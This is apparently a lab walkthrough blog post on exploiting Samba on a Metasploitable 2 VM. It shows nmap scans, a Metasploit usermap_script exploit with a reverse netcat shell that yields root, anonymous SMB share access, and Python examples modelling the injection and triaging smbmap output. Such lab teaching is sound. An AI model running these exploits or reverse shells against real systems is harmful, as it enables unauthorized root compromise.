Techniques for Exploiting SMB Servers

Hacker Halt
3 min readAug 29, 2024


Email : hackerhalt02@gmail.com

YouTube Channel : https://bit.ly/3TCtwNU

Given : 192.168.1.10 Metasploitable Machine

Nmap Port Scanning

┌──(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 04:27 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00020s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

SMB Enumeration

┌──(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -p445,139 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 03:58 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds

Metasploit Framework

Nmap's version probe only narrows Samba down to 3.X - 4.X, which is not precise enough to choose an exploit on its own. The exact build, Samba 3.0.20-Debian, shows up later in the comment of the IPC$ share when the shares are listed with smbclient. Samba 3.0.20 through 3.0.25rc3 is affected by CVE-2007-2447: when the non-default "username map script" option is set in smb.conf (Metasploitable 2 ships with it enabled), smbd hands the client-supplied username to that script through /bin/sh without escaping, so shell metacharacters in the username are executed as root. That is exactly what exploit/multi/samba/usermap_script abuses. Before the option listing below, the module was loaded with use exploit/multi/samba/usermap_script and the target and listener were set with set RHOSTS 192.168.1.10 and set LHOST 192.168.1.6.

msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.10:33258) at 2024-08-28 04:04:51 -0400

whoami
root
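The root shell above comes from the shell-metacharacter injection described in the previous section. The block below is an added example, not Samba's source and not the Metasploit module: it models the bug class in a few lines of Python so the behaviour can be observed locally. The vulnerable function builds the map-script command line as a string and runs it through /bin/sh, the way affected Samba builds did; the hardened version passes the username as a separate argv element so no shell ever interprets it. /bin/echo stands in for the map script (an assumption made here so the example has no side effects), and the attacker username is constructed for this example.

```python
"""Model of the CVE-2007-2447 "username map script" injection (added example)."""
import subprocess

# Stand-in for the 'username map script' path from smb.conf. /bin/echo is an
# assumption for this example; a real script would look the account up.
MAP_SCRIPT = "/bin/echo"

# Constructed attacker-controlled username. The Metasploit module uses the same
# shape, "/=`nohup <payload>`"; here the backticks just run a harmless expr.
ATTACKER_USERNAME = "/=`expr 40 + 2`"


def map_user_vulnerable(username: str) -> str:
    """Mimic the flawed behaviour: interpolate the username into a command line
    and hand the whole string to /bin/sh, which evaluates the backticks."""
    cmd = f'{MAP_SCRIPT} "{username}"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def map_user_hardened(username: str) -> str:
    """Pass the username as one argv element. No shell is involved, so the
    backticks reach the script as literal characters."""
    result = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return result.stdout.strip()


def was_injected(output: str) -> bool:
    """The literal username never contains "42"; only shell evaluation produces it."""
    return "42" in output


if __name__ == "__main__":
    print("vulnerable:", map_user_vulnerable(ATTACKER_USERNAME))  # /=42
    print("hardened:  ", map_user_hardened(ATTACKER_USERNAME))    # /=`expr 40 + 2`
```

The fix Samba shipped is the same idea as map_user_hardened: stop building a shell command string from untrusted input. Any service that passes a client-supplied identifier to a helper script should be checked for this pattern, not just Samba.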

SMB Anonymous Login

To enumerate the shares exposed on ports 139 and 445 we use the smbclient tool. -N skips the password prompt (a null session) and -L lists the shares offered by the host:

smbclient -N -L //192.168.1.10
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE

┌──(hackerhalt㉿kali)-[~]
└─$ smbclient //192.168.1.10/tmp
Password for [WORKGROUP\hackerhalt]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

Without -N, smbclient asks for a password; pressing Enter sends an empty password, which this server also accepts as an anonymous login, so the tmp share can be browsed without any credentials.

Share permissions with smbmap

smbclient only lists the share names. smbmap additionally reports what a null session is allowed to do with each share, which is the part that matters for triage:

┌──(hackerhalt㉿kali)-[~]
└─$ smbmap -H 192.168.1.10

SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 192.168.1.10:445 Name: 192.168.1.10 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
[*] Closed 1 connections
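When smbmap is run against many hosts, the useful output is the handful of shares a null session can actually read or write, plus the Samba build string hidden in the share comments. The following is an added example, not part of the original post and not part of smbmap: it parses the table format shown above into records, picks out the exposed shares, extracts the Samba version from the IPC$ comment, and checks that version against the CVE-2007-2447 range (3.0.20 up to 3.0.25rc3). The sample text is this host's smbmap result, embedded as a constructed input so the script runs offline. The version check is a banner heuristic only; a distribution may backport the fix without changing the version string.

```python
"""Triage helper for smbmap output (added example)."""
import re
from dataclasses import dataclass

# Constructed sample: the smbmap table from the scan above, embedded for offline use.
SAMPLE_SMBMAP = """\
[+] IP: 192.168.1.10:445 Name: 192.168.1.10 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
[*] Closed 1 connections
"""

HOST_RE = re.compile(r"^\[\+\] IP: (?P<ip>[^:\s]+):(?P<port>\d+)\s+Name: \S+\s+Status: (?P<status>\w+)")
# smbmap prints one of these four permission strings per share.
SHARE_RE = re.compile(r"^(?P<name>\S+)\s+(?P<perm>NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(?P<comment>.*)$")
SAMBA_RE = re.compile(r"Samba (?P<ver>[\w.\-]+)")


@dataclass
class Share:
    host: str
    name: str
    readable: bool
    writable: bool
    comment: str


def parse_smbmap(text):
    """Turn smbmap's per-host share table into Share records."""
    shares = []
    host = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group("ip")
            continue
        m = SHARE_RE.match(line)
        if m and host:
            perm = m.group("perm")
            shares.append(Share(host, m.group("name"), "READ" in perm,
                                "WRITE" in perm, m.group("comment").strip()))
    return shares


def exposed_shares(shares):
    """Shares a null session can read or write; these are the ones to look at first."""
    return [s for s in shares if s.readable or s.writable]


def samba_version(shares):
    """Samba build string leaked through the IPC$/ADMIN$ share comments, if present."""
    for s in shares:
        m = SAMBA_RE.search(s.comment)
        if m:
            return m.group("ver")
    return None


def in_usermap_script_range(version):
    """True for builds affected by CVE-2007-2447: 3.0.20 through 3.0.25rc3."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", version)
    if not m:
        return False
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    rc = m.group(4)
    if (major, minor) != (3, 0):
        return False
    if 20 <= patch <= 24:
        return True
    return patch == 25 and rc is not None and int(rc[2:]) <= 3


if __name__ == "__main__":
    found = parse_smbmap(SAMPLE_SMBMAP)
    for s in exposed_shares(found):
        print(f"{s.host} {s.name} read={s.readable} write={s.writable} ({s.comment})")
    ver = samba_version(found)
    print("Samba", ver, "usermap_script candidate:", in_usermap_script_range(ver))
```

Run against the sample it reports tmp as readable and writable and flags Samba 3.0.20-Debian as a usermap_script candidate, which matches what the Metasploit run above confirmed.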


Written by Hacker Halt

Professional Cyber Security Trainer, Red Teamer, Bug Bounty Hunter, YouTube Content Creator, CEH, VAPT, CCNA, MAPT, CFI @haltacademy